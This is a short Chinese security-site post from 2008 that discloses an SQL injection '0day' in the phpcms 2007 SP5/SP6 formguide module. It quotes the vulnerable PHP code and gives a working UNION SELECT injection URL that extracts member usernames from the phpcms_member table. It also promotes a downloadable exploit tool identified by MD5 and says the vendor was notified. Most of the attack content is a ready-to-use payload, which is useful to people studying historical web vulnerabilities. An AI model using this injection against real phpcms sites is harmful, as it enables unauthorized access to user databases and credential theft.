安全中国首页 > 文章中心 > 综合注入文章
 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:download.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 

phpcms injection 三八贺岁 0day

更新时间:2008-3-9 0:19:49
责任编辑:阿loosen
热 点:
影响版本:2007SP5 SP6
漏洞文件:/formguide/include/tag.func.php
Author:backerhack 小蟑螂
信息来源:零客网安 www.0kee.com
祝全国女性同胞们节日快乐,关注女性健康… “她好,我也好”
------------灰常淫荡的分割线-------------------------------------------------------
 {
 global $db,$MOD,$MODULE;
 $formid = (!isset($formid)||$formid=='') ? 0 : $formid;
 $query = "SELECT * FROM ".TABLE_FORMGUIDE." WHERE formid=$formid limit 1";
 $r = $db->get_one($query);
 if(!$r)
 {
 echo $LANG['not_exist_form'];
 return '';
 }

变量formid未赋值且过滤不严带入查询导致注入。
测试:http://phpcmsroot/formguide/index.php?formid=1/**/and/**/1=2/**/union/**/select/**/1,username,3,4,5,6,7/**/from/**/phpcms_member/**/where/**/userid=1/*
附上sniperhg写的利用工具… 写的真的很强大,赞一个!
phpcms0dayEXP.exe MD5值:cae31a3ef566ed06068473d787d76359
本文发表前已通知官方。

 
相关文章
一日一文章
 
一日一软件
一日一动画